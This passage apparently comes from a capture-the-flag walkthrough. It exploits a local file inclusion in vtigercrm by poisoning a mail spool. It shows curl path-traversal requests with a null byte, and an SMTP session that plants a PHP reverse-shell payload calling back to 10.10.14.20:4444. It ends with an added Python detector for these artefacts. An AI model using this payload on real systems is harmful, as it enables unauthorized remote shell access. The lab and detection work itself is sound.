Mail log

Example from 10.10.10.7

Since this server has SMTP running on port 25, we can take advantage of that service to try to "poison" the user's mail spool in /var/mail/<user>. For this attack to succeed, the application we are exploiting through the LFI needs read access to that file. In this case we can see below that we can read the mail of the user asterisk:

└──╼ $curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00
From asterisk@beep.localdomain Mon Jan 28 21:04:02 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain
Received: by beep.localdomain (Postfix, from userid 100)
id 1BBB2D9301; Mon, 28 Jan 2019 21:04:02 +0200 (EET)
From: root@beep.localdomain (Cron Daemon)
To: asterisk@beep.localdomain
Subject: Cron <asterisk@beep> /var/lib/asterisk/bin/freepbx-cron-scheduler.php
Content-Type: text/plain; charset=UTF-8
Auto-Submitted: auto-generated
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/var/lib/asterisk>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=asterisk>
X-Cron-Env: <USER=asterisk>
Message-Id: <20190128190402.1BBB2D9301@beep.localdomain>
Date: Mon, 28 Jan 2019 21:02:01 +0200 (EET)
Mon, 28 Jan 2019 21:02:01 +0200 - Got event.. fullybooted
Mon, 28 Jan 2019 21:02:01 +0200 - No event handler for event 'fullybooted'
From asterisk@beep.localdomain Tue Jan 29 21:04:01 2019
Return-Path: <asterisk@beep.localdomain>
X-Original-To: asterisk
Delivered-To: asterisk@beep.localdomain

By connecting to the SMTP server we can also send PHP code in the hope that the server will execute it when the spool is included. In this case we have sent a mail to the user asterisk, with the body containing a reverse shell command:

└──╼ $telnet 10.10.10.7 25
Trying 10.10.10.7...
Connected to 10.10.10.7.
Escape character is '^]'.
220 beep.localdomain ESMTP Postfix
EHLO me
250-beep.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
mail from: raf@pwned.com
250 2.1.0 Ok
rcpt to: asterisk@localhost
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1'");?>
.
250 2.0.0 Ok: queued as 399A4D9301
quit
221 2.0.0 Bye
Connection closed by foreign host.

Now that the mail has been queued, all we need to do to test our theory is to send the GET request once again to the address below, so that the poisoned spool is included and the shell is triggered (if successful, the GET request will hang):

curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00
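As an added defensive example (not part of the original write-up), the following Python script flags the two artefacts this technique leaves behind: a web access-log request that traverses into /var/mail or another sensitive path (percent-decoded repeatedly so double encoding does not hide the `../` or the `%00`), and a PHP open tag sitting in a mail spool. The log lines and spool text are constructed samples, and the sensitive-path list is an assumption to be tuned per host.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log sample (not captured from the page's target).
SAMPLE_LOG = """\
10.10.14.20 - - [28/Jan/2019:21:10:01 +0200] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00 HTTP/1.1" 200 1337 "-" "curl/7.64.0"
10.10.14.20 - - [28/Jan/2019:21:11:05 +0200] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2fvar%2flog%2fhttpd%2faccess_log HTTP/1.1" 200 9000 "-" "curl/7.64.0"
192.168.1.5 - - [28/Jan/2019:21:12:00 +0200] "GET /vtigercrm/index.php?module=Calendar HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
"""
# Constructed mbox excerpt whose body carries a PHP open tag.
SAMPLE_SPOOL = 'From raf@pwned.com Tue Jan 29 21:30:00 2019\n\n<?php exec("id"); ?>\n'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Paths an LFI is typically pointed at to read or execute planted content (assumed list)
SENSITIVE = ("/var/mail/", "/var/log/", "/proc/self/environ", "/etc/passwd")
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

def decode_uri(uri):
    """Percent-decode until stable so double encoding (%252e, %2500) is caught."""
    prev = None
    while prev != uri:
        prev, uri = uri, unquote(uri)
    return uri

def analyze(uri):
    """Return the indicator names found in a request URI, in a fixed order."""
    d = decode_uri(uri)
    hits = []
    if "../" in d or "..\\" in d:
        hits.append("path_traversal")
    if "\x00" in d:          # %00 used to truncate an appended extension
        hits.append("null_byte")
    if any(s in d for s in SENSITIVE):
        hits.append("sensitive_file")
    return hits

def scan_log(text):
    """Alert on every request that traverses into a sensitive file."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = analyze(m["uri"])
        if "path_traversal" in hits and "sensitive_file" in hits:
            alerts.append({"ip": m["ip"], "ts": m["ts"],
                           "status": m["status"], "indicators": hits})
    return alerts

def spool_has_php(text):
    """True if a mail spool contains a PHP open tag, which a cron mail never should."""
    return PHP_TAG_RE.search(text) is not None
```

Running `scan_log` over the real access log and `spool_has_php` over each file under /var/mail gives two independent signals; either one alone is worth a ticket, both together are the full chain described above.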

Successful reverse shell through mail log poisoning: